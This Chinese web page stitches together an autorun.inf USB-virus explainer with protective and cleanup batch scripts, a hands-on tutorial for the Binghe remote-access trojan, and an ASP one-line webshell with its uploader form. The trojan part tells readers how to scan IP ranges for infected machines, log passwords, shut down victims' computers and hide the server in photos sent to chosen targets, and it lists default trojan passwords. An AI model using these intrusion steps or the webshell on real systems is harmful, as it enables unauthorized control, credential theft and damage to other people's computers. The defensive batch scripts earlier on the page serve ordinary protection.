木马复制文件_如何使用木马程序复制文本

hacker|
143

如何用inf文件复制文件和移动文件?

嗯!我只知道这么多! autorun.inf目录

总说

现状分析

应对策略

autorun.inf

[AutoRun.alpha]部分的命令简介

[编辑本段]总说

U盘对病毒的传播要借助autorun.inf文件的帮助,病毒首先把自身复制到u盘,然后创建一个autorun.inf,在你双击u盘时,会根据autorun.inf中的设置去运行u盘中的病毒,我们只要可以阻止autorun.inf文件的创建,那么U盘上就算有病毒也只能躺着睡大觉了,大家可能也想到这个,但是不管给autorun.inf设置了什么属性,病毒都会更改它,我提到的 *** 就是,在根目录下,删除autorun.inf文件,然后,根目下建立一个文件夹,名字就叫autorun.inf,这样一来,因为在同一目录下,病毒就无能为力,创建不了autorun.inf文件了,以后会不会出新病毒,自动去删文件夹,然后再建立文件就不知道了,但至少现阶段,这种 *** 是非常有效的。但是,由于这个文件夹可以被改名,因此许多新的木马和病毒采用改名后再创建autorun.inf文件来达到感染U盘的目的。不过对于安全意识强的用户,用这种 *** 来判断自己的U盘是否遭到感染也未尝不可。

[编辑本段]现状分析

事实表明,目前已经有新的病毒能够有意识地检测autorun.inf的存在,对于能直接删除的则删之,对于“无法删除”的则用重命名的方式毁之;还有一种很早就出现的以文件名诱骗用户点击的病毒(如:重要文件.exe,小说.exe)。对于以上这两种传播方式的病毒,仅仅建立autorun.inf文件夹是抵御不了的。

[编辑本段]应对策略

1、在插入U盘时按住键盘 shift 键直到系统提示“设备可以使用”,然后打开U盘时不要双击打开,也不要用右键菜单的打开选项打开,而要使用资源管理器(打开我的电脑,按下上面的“文件夹”按钮,或者开始-所有程序-附件-windows资源管理器)将其打开,或者使用快捷键winkey+E打开资源管理器后,一定通过左侧栏的树形目录打开可移动设备!(要养成这样的良好习惯)

2、如果盘内有来路不明的文件,尤其是文件名比较诱惑人的文件,必须多加小心;需要特别提示的是,不要看到图标是文件夹就理所当然是文件夹,不要看到图标是记事本就理所当然是记事本,伪装图标是病毒惯用伎俩。

3、要有显示文件扩展名的习惯 。 *** :打开“我的电脑”,工具--文件夹选项--查看,去掉“隐藏已知文件类型的扩展名”的勾,建议选择显示扩展名同时选上“显示隐藏文件”,去掉“不显示系统文件”的勾,这样可以对病毒看得更清楚。有图标的诱人的病毒文件基本都是可执行文件,显示文件扩展名之后,通过文件名后的".exe"即可判断出一个文件可执行文件,从而不会把伪装的病毒可执行文件误认为是正常文件或文件夹。

4、最后不管你用什么办法,或者用什么软件,插入U盘然后用这个 *** 检验你有没有中Autorun.inf型病毒的风险。

下面这个批处理可以检验你插入或打开U盘时是否有激活病毒的风险。运行这个批处理,然后按提示操作。注,批处理使用 *** :打开开始菜单-附件-记事本,复制批处理内容进去,文件-另存为-文件名:xxxxxxx.bat,保存类型:所有文件-保存。然后找到你保存的位置,会出现一个批处理文件,双击运行即可。

@echo offsetlocal enabledelayedexpansion

echo 请在U盘和电脑没有病毒的情况下插入一个U盘set /p "d=请输入U盘的盘符(比如输入H): "

set "d=!d:~0,1!"set "a=autorun.inf.!random!.tmp"

if exist !d!:\autorun.inf attrib.exe -s -h -r !d!:\autorun.infren !d!:\autorun.inf !a!

(echo [autorun]echo open=calc.exeecho shellexecute=calc.exeecho shell=explore

echo shell\open\command=calc.exeecho shell\explore\command=calc.exe)!d!:\autorun.inf

echo 现在删除并重新插入U盘echo 打开U盘,如果出现"计算器"echo 说明你有中Autorun.inf类型病毒的机会

echo 完成后按任意键继续pausenul

del !d!:\autorun.infif exist !d!:\!a! ren !d!:\!a! autorun.infgoto :eof

推荐的其他 *** :

1、推荐一种彻底拒绝Autorun.inf类型病毒的 *** .

运行下面这个批处理,就可以保证插入以及打开磁盘时不中病毒(不会占用计算机资源,运行一次即可对当前用户名生效):

@ECHO off

REG.exe DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f

REG.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

ECHO HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 []%temp%\temp.txt

REGINI.exe %temp%\temp.txt

GOTO :eof

如果想再恢复Autorun.inf功能运行这个批处理:

@ECHO off

ECHO HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 [7]%temp%\temp.txt

REGINI.exe %temp%\temp.txt

REG.exe DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f

REG.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

GOTO :eof

2、对于伪装型病毒,可以通过它的可执行属性判断出来。

除通过选择文件夹选项“不隐藏扩展名”外,不喜欢显示所有为文件扩展名的用户还可以通过这种方式将可执行文件的特征--".exe"扩展名显示出来,这样病毒伪装成的文件或文件夹会多出一个".exe"。

以管理员身份运行下面的批处理:

@ECHO off

REG.exe ADD HKCR\exefile /v AlwaysShowExt /t REG_SZ /f

TASKKILL.exe /im explorer.exe /f

START %windir%\explorer.exe

GOTO :eof

要恢复不显示exe扩展名运行这个批处理:

@ECHO off

REG.exe DELETE HKCR\exefile /v AlwaysShowExt /f

TASKKILL.exe /im explorer.exe /f

START %windir%\explorer.exe

GOTO :eof

[编辑本段]autorun.inf

autorun.inf文件是从Windows95开始的,最初用在其安装盘里,实现自动安装,以后的各版本都保留了该文件并且部分内容也可用于其他存储设备。

其结构有三个部分:[AutoRun] [AutoRun.Alpha] [DeviceInstall]

[AutoRun]适用于Windows95以上系统与32位以上CD-ROM,必选。

[AutoRun.alpha]适用于基于RISC的计算机光驱,适用系统为Windows NT 4.0,可选。

[DeviceInstall]适用于Windows XP以上系统,可选。

[AutoRun]部分的命令及其详解

1、DefaultIcon

含义:指定应用程序的默认图标。

格式:

DefalutIcon=图标路径名[,序号]

参数:

图标文件名:应用程序的默认图标路径名,格式可以为.ico、.bmp、.exe、.dll。当文件格式为.exe和.dll时,有时需要使用序号来指定图标。

序号:当文件格式为.exe和.dll时,文件可能包括多余一个图标,此时需要使用序号来指定图标,需要注意的是,序号是从0开始的。

备注:

应用程序的默认图标将在windows explorer核心的驱动显示窗口中替代设备的默认图标来显示。

图标路径名的默认目录是设备根目录。

2、Icon

含义:指定设备显示图标。

格式:

Icon=图标路径名[,序号]

参数:

图标文件名:应用程序的默认图标路径名,格式可以为.ico、.bmp、.exe、.dll。当文件格式为.exe和.dll时,有时需要使用序号来指定图标。

序号:当文件格式为.exe和.dll时,文件可能包括多余一个图标,此时需要使用序号来指定图标,需要注意的是,序号是从0开始的。

备注:

设备显示图标将在windows explorer核心的驱动显示窗口中替代设备的默认图标来显示。

图标路径名的默认目录是设备根目录。

当存在应用程序默认图标(DefaultIcon)时,本命令无效。

3、Label

含义:指定设备描述

格式:

Label=描述

参数:

描述:任意文字,可以包括空格。

备注:

设备描述将在windows explorer核心的驱动显示窗口中替代设备的默认描述卷标来显示。

在非windows explorer核心的驱动显示窗口中(例如右击设备选择属性)显示的仍然是设备的卷标。

4、Open

含义:指定设备启用时运行之命令行。

格式:

Open=命令行

(命令行:程序路径名 [参数])

参数:

命令行:自动运行的命令行,必须是.exe、.com、.bat文件,其他格式文件可以使用start.exe打开或使用ShellExecute命令。

备注:

命令行的起始目录是设备根目录和系统的$Path环境变量。

5、ShellExecute

含义:

指定设备启用时执行文件。(操作系统支持未知)

格式:

ShellExecute=执行文件路径名 [参数]

参数:

执行文件路径名:设备启用时执行文件路径名。可以是任意格式文件。系统会调用设置的程序执行此文件。

参数:参数,根据执行文件作调整

备注:

命令行的起始目录是设备根目录和系统的$Path环境变量。

6、Shell关键字Command

含义:

定义设备右键菜单执行命令行。

格式:

Shell关键字Command=命令行

(命令行:程序路径名 [参数])

参数:

命令行:自动运行的命令行,必须是.exe、.com、.bat文件,其他格式文件可以使用start.exe打开。

备注:

命令行的起始目录是设备根目录和系统的$Path环境变量。

7、Shell关键字

含义:定义设备右键菜单文本。

格式:

Shell关键字=文本

参数:

关键字:用以标记菜单,可以使用任何字符表示,包括空格。

文本:在右键菜单中显示的文本。可以使用任何字符,不能存在空格。

备注:

在同一Autorun.inf文件中,不同右键菜单关键字不同,相同右键菜单关键字相同。

右键菜单文本中可以使用设定加速键,输出一个。

Shell关键字Command命令Shell关键字两者缺一不可,顺序无所谓。

当不存在Open、ShellExecute与Shell命令时,设备启用时运行之一个设备右键菜单指定命令。

8、Shell

含义:定义设备启用时运行之设备右键命令。

格式:

Shell=关键字

参数:

关键字:标记过的菜单关键字

备注:

Shell指定的关键字可以在AutoRun.inf文件的任意部分。

OpenShellExecuteShell命令后定义的优先级高。

[编辑本段][AutoRun.alpha]部分的命令简介

[AutoRun.alpha]部分的命令与[AutoRun]部分的命令相同,只不过在基于RISC的计算机光驱中,[AutoRun.alpha]优先级高于[AutoRun]

[DeviceInstall]部分命令及其详解

DriverPath

含义:定义搜索驱动程序目录。

格式:

DriverPath=驱动程序路径

参数:

驱动程序路径:驱动程序所在路径,包括其子路径。

备注:

Windows XP以上支持。

仅CD-ROM支持

当系统监测到一个新的设备时,会提示用户寻找设备的驱动程序。当用户点选此CD-ROM时,当[DeviceInstall]部分存在时,系统会按照DriverPath所标记的路径出寻找驱动程序。未标记的路径系统将忽略查找。当[DeviceInstall]部分不存在时,系统将进行完全查找。

如果不希望系统在此CD-ROM中搜索驱动程序,只加一行[DeviceInstall]不加DriverPath命令即可。

系统识别该文件过程如下:

系统在插入U盘的时候会根据这个AUTORUN.INF文件在注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2]下建立一个u盘的关联项,使双击打开指定的程序(如病毒程序)。

Windows 2000/XP下如何删除autorun.inf文件夹在命令提示符中,输入rd (文件夹路径)即可删除文件夹

如文件夹内有内容可把rd替换为deltree来完成删除。

========================================================================

清除autorun病毒的批处理文件代码

u盘插上

首先新建个文本文档,在里面添加以下内容:

@echo on

taskkill /im explorer.exe /f

rem 结束病毒进程(以u.vbe病毒的进程w.exe为例)

taskkill /im w.exe

start reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\EXplorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f

start reg import kill.reg

del c:\autorun.* /f /q /as

del %SYSTEMROOT%\system32\autorun.* /f /q /as

del d:\autorun.* /f /q /as

del e:\autorun.* /f /q /as

del f:\autorun.* /f /q /as

del g:\autorun.* /f /q /as

del h:\autorun.* /f /q /as

del i:\autorun.* /f /q /as

del j:\autorun.* /f /q /as

del k:\autorun.* /f /q /as

del l:\autorun.* /f /q /as

start explorer.exe

=====到这里为止(这行不用复制)==========================

其次打开我的电脑,在菜单栏里选择“工具-文件夹选项-查看”,将“隐藏已知文件类型的扩展名”前面的勾去掉-确定-退出窗口。

再次将刚才新建的那个文件文档的文件名,由“新建文本文档.txt”改为“u.vbe病毒消除.bat”。

最后直接双击它就能清除这个病毒了!

【另外】对于杀毒软件产生的此类文件夹(如超级巡警),可用DOS命令快速干净的删除, *** 如下

假设autorun.inf文件夹是在D盘,操作如下: 打开“开始”,选择“运行”,输入“CMD”,打开命令行窗口,在命令行窗口中输入一下命令:

之一步:输入D: 然后回车

第二步:输入rmdir /s autorun.inf 然后回车

第三步:当出现提示时,按“Y”,并回车

其他盘照此 *** 执行即可!!

怎么用木马?

木马和冰河的使用!【教程】

木马

大家对他的名字很熟悉吧??是啊木马作为一个远程控制的软件已经深入人心,木马是

什么那?如何使用木马程序控制他人那??先不要着急,我们来看看木马的发展,对这

个工具作一个简单的介绍:

黑客程序里的特洛伊木马有以下的特点:

(1)主程序有两个,一个是服务端,另一个是控制端。(如果你下载了,请千万不要

用鼠标双击服务器端)

(2)服务端需要在主机(被你控制的电脑)执行。

(3)一般特洛伊木马程序都是隐蔽的进程。(需要专业的软件来查杀,也有不用软件

查杀的办法,我会介绍)

(4)当控制端连接服务端主机后,控制端会向服务端主机发出命令。而服务端主机在

接受命令后,会执行相应的任务。

(5)每个系统都存在特洛伊木马。(包括Windows,Unix,liunx等)

眼中,特洛伊木马是一种病毒。其实特洛伊木马并不是一种病毒,它没有完全具备病

毒的性质。(包括:转播,感染文件等,但是很多的杀毒软件还是可以查杀,毕竟这是

一种使用简单但是危害比较大的软件)

木马的发展:

之一代木马:控制端 -- 连接 -- 服务端

特点:属于被动型木马。能上传,下载,修改注册表,得到内存密码等。

典型木马:冰河,NetSpy,back orifice(简称:BO)等。

第二代木马:服务端 -- 连接 -- 控制端

特点:属于主动型木马。隐蔽性更强,有利用ICMP协议隐藏端口的,有利用DLL(动态

连接库)隐藏进程的,甚至出现能传播的木马。

典型木马: *** 神偷,广外女生等。(反弹端口型木马)

第二代木马象广外女生可以使用WINDOWS的漏洞,越过许多防火墙从而进行对系统的监

控(像金山,天网等)

随着木马的发展,并且作为很多人使用的软件,杀毒软件也越来越对这个传播很广的半

病毒不病毒的软件越来越关注(因为作为服务器端可以夹带在任何文件中传播,只要你

打开这个文件,你就肯定会被中上木马,甚至可以在 *** 上通过下载来传播)所以查杀

木马的工具很多,但是道高一尺,魔高一丈,木马又不断演化出新的品种来对抗杀毒软

件,毕竟中国的广大网民的安全意识不高,加上盗版猖狂,可以正式在 *** 上进行升级

的并不多,所以木马还是很有使用空间的。下面,我们将介绍一款国产的木马-------

冰河。

需要工具:冰河(随便你找什么版本,因为界面根本就差不多)

Superscan3.0 中文汉化版(上黑白搜索一下可以找到)

首先最重要的一步-------工具接压缩(啊~~我知道是废话。。大家多多包涵嘛。。不

要打拉)

然后运行Superscan3.0(就是那连着的两个电脑图标)

出现界面在IP表里面有两个选项

起始IP:

终止IP:

随便填上两个IP地址(更好是C类IP范围从192.0.0.0--223.255.255.255)

顺便讲一下IP的类型:

A类范围:0.0.0.0---127.255.255.255

B类范围:128.0.0.0---191.255.255.255

C类范围:192.0.0.0---223.255.255.255

D类范围:224.0.0.0---239.255.255.255

E类范围:240.0.0.0---247.255.255.255

一般只有B、C类用的着D类地址是用于多点播送的其他的我也不是很清楚,有兴趣的朋

友可以看看相关的资料。。。。。

闲话说到这里我们继续看起始IP和终止IP

我给大家一个参考

起始IP:202.103.139.1

终止IP:2020103.139.255

填好这个在扫描类型里看列表中定义:

你可以扫描很多的端口,但那对我们的木马攻击没有实际意义

所以我们把两个窗口填上7626(冰河服务端开的端口)。

好了,点开始。

扫描结果会出现在底下兰色的列表中

当然不是所有的结果都有用你要按“Prune”把多余的IP删除掉。剩下IP就是中了冰河

的主机。(假如没有找到,请不要灰心,继续扫描。一个成功的黑客最重要是有耐心

!)

好了打开我们的冰河的客户端(再次提醒!!千万不要点服务器端!!!否则你等于种

木马给自己!!什么??你已经点了??你不会那么傻吧。。。。)

具体功能包括:

1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕

变化的同时,监控端的一切键盘及鼠标*作将反映在被控端屏幕(局域网适用);

2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对

话框中出现过的口令信息;

3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、*作系统版本、当

前显示分辨率、物理及逻辑磁盘信息等多项系统数据;

4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定

注册表等多项功能限制;

5.远程文件*作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏

览文本文件、远程打开文件(提供了四中不同的打开方式--正常方式、更大化、最小化

和隐藏方式)等多项文件*作功能;

6.注册表*作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表

*作功能;

7.发送信息:以四种常用图标向被控端发送简短信息;

8.点对点通讯:以聊天室形式同被控端进行在线交谈。

呵呵,是不是很拽??哼哼~~我叫你不服!!!我要删掉你C盘文件!!!修改你注册

表!!盗你 *** 号码!!上网帐号!!

!………………………………………………………………

罗嗦一下!!你们千万不要搞破坏哦,学会了使用就好。。。

接着,我会介绍特洛伊木马“冰河”的使用:

首先打开客户端

出现*作界面

文件 编辑 设置 帮助

点文件出现下拉菜单

点自动搜索

出现提示框

里面只有起始域 起使地址 终止地址

这三个比较有用

比如我刚才用Superscan3.0 中文汉化版搜索到的IP是202.103.139.25

那么我们就在起始域里输入:202.103.139

起始地址:25

终止地址:25

表示搜索这一个主机

如果扫描结果里显示ERR表示该计算机没有种木马,如果是OK你就爽拉~~

(你也可以在起始域里输入:202.103.139起始里面:1终止里面255,这样是搜索

202.103.139子网里所有的计算机)

看到这里有的朋友会问拉,既然木马可以自己扫描为什么还要上面哪个工具??嘿嘿~~

哪个比较快嘛,多学一点没有坏处的~~(啊~~我错了还不行??大家息怒)

只要有扫到的OK的IP就会把该计算机的IP添到主界面的文件管理的下面他的前面有一个

小加号,点开他你可以随便对对方的文件进行修改删除了,你甚至可以上传一个病毒到

他的文件夹中(不推荐,你们没那么大仇吧??)

好了我们再来看看文件管理右面的命令控制台,这里有你感兴趣的东西哦~~命令很简单

都是一看就会的,你们只要每个都实验一下就知道作什么用的拉

由于危害性我只介绍一个点“命令控制台”---“控制类命令”---“系统控制”

简单的就象小孩子的游戏~~~

看看下面有什么??

远程关闭计算机

远程从新启动计算机

后面两个没什么用不理他也罢

你只要点一下远程“关闭计算机”

OK拉,他的电脑自己关机拉,不相信??好, *** 上和他说话,他能回答你才怪:)

好了,关于*作的 *** 我已经向大家介绍了,这是一个傻瓜式的软件,*作命令全中文,

作用一看就知道,很容易上手,用他来盗 *** 也不错哦~~~~(在口令类命令的系统信息及

口令里,要先做键盘记录哦)具体 *** 请自己研究,我可不想犯罪。。

关于使用 *** 就介绍到这里,到这里以上为止都是对不特定人物的入侵,那么要怎么对

特定的人物进行入侵那??记得我不叫你们点的服务器端吗?呵呵,就是他,他是没有

图标的一个运行文件,可以夹带在几乎任何文件里运送,比如照片,FLASH等……(有

相关的合成软件,我不知道具体那里有下载,不过我有的,你们需要可以找我,不过不

要拿来作坏事)你只需要给你的网友用 *** 传送个照片呀,一篇文章呀就可以顺利种上木

马,然后你要取得他(她)的IP地址就可以对他进行控制拉,这 *** 不是我教你们的啊

!!以后不要出卖我,还有电子邮件也可以传播。。。。。。。木马病毒。。

*** 有很多大家可以自己研究。。。。。。

下面有几点提示:

1:为什么我解压缩的时候杀毒软件老是报有病毒呀??

木马本身就是一个病毒,只要你不点服务器端,对你不会造成任何影响

运行的时候也要关掉防火墙,否则系统无法运行。

2:为什么我种上木马以后连接不到计算机??

很简单,你的版本过旧拉,去下载新的版本吧,再者对方在网吧,由于

设定和家里不一样所以无法连接请尽量选择在家里的倒霉鬼进行实验。

什么??你不知道他是不是在家??看 *** 的IP地址

比如对方IP是202.103.139.22:4000表示在家

202.103.139.22:1030网吧

只有后面是4000、7000的用户是在家

有的时候是4001、4002表示对方现在运行的 *** 数目,不用管他

3:关于冰河的万能密码:

2.2版:Can you speak chinese?

2.2版:05181977

3.0版:yzkzero

3.0版:yzkzero.51.net

3.0版:yzkzero!

3.1-netbug版密码: 123456!@

2.2杀手专版:05181977

2.2杀手专版:dzq2000!

有的是要密码口令登陆的,不过一般不要,也不用刻意注意

4:我也种上服务器端了,对方也在家,他也并没发觉我给他种了,但就是连接不正常

呵呵,对方懂得使用 *** 服务器那你看到的IP地址不是真实的IP地址。这种情况,你还

是放弃吧。

5:冰河是一个很麻烦的家伙,卸载很麻烦就是你安装以后卸载和其他的程序不一样

网上相关文章很多,我由于最近考试关系就不一一介绍了,你可以去黑白 *** 看看:)

6:如果清除冰河服务端:

*** 一: 俗话说,解铃还需系铃人。中了冰河,就用它的控制端来卸载服务端。具体

*** :

1、启动“冰河”的控制端程序。

2、选择“文件”--“添加主机”,或者直接点击快接按钮栏的之一个图标 。

3、弹出的对话框中,“远程主机”一项,填写自己的IP。

4、连接服务端,然后,点击“命令控制台”标签。

5、选择“控制类命令”--“系统控制”,在右面的窗口下方,你会发现四个按钮。点

击“自动卸载”,就将冰河的服务器端清除了。

*** 二:

冰河 v1.1

1、打开注册表“Regedit.exe”。(可以在“开始”--“运行”里输入

“regedit”。)

2、点击目录至:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

3、查找以下的两个路径,并删除

“C:\windows\system\kernel32.exe”

"“C:\windows\system\sysexplr.exe”

4、关闭“Regedit.exe”,重新启动Windows。

5、删除“C:\windows\system\kernel32.exe”和

“C:\windows\system\sysexplr.exe”木马程序。

6:重新启动。完成。

*** 一是对于你给别人种的服务器端的,记得玩完以后给人家清除掉,作事情不要那么

决情!!

*** 二是对于清除自己计算机里的服务器端的,现在就好好看看是不是由于自己的疏忽

被人家种下冰河。。。。。。。。。

小结:对于木马的大家庭来说冰河只是一个小弟弟,但是大家也看到了他的危害性,所

以本人只建议大家学习这个软件,并不是用他去干什么,恶意破坏是低级黑客(根本可

以说是菜鸟)的做法,建议大家不要搞破坏,学习就好。。。。。。。。。。

我想知道一句话木马的简易使用 *** ~!

蓝屏大叔一句话木马共用两个文件,蓝屏大叔一句话木马服务端和连接端(蓝屏大叔一句话服务端.asp/蓝屏大叔连接端.htm)

简单的介绍一下链接 *** ,这是链接端的内容:

form action=http://你的木马网址 method=post !--网址改为你的后门地址--

textarea name=value cols=120 rows=10 width=45

set lP=server.createObject("Adodb.Stream")

lP.Open

lP.Type=2

lP.CharSet="gb2312"

lP.writetext request("fhod")

lP.SaveToFile server.mappath("ck.asp"),2

lP.Close

set lP=nothing

response.redirect "ck.asp"

/textarea

textarea name=fhod cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr

input type=submit value=提交

这是服务端即上传到肉鸡上的木马内容:

%execute request("value")%

就这一句话

给大家看下效果,首先将"蓝屏大叔一句话服务端.asp"上传到肉鸡,如下图.我改了名为"daishu.asp"

然后打开"蓝屏大叔连接端.htm"源文件(打开 *** "右键单击"蓝屏大叔连接端.htm"选择用记事本打开"如下图,把"http://你

的木马网址"这上段内容改成你的服务端地址即可

保存退出,打开"蓝屏大叔连接端.htm",在"添入生成木马的内容"文本框中输入你的木马内容即可,比如这里把"站长助手"上

传上去,只要把"站长助手的源文件复制到这里面即可,点上传,看下图效果:

站长助手源代码复制到这里效果

上传的默认文件名为"ck.asp"输入密码就可以进入了

0条大神的评论

发表评论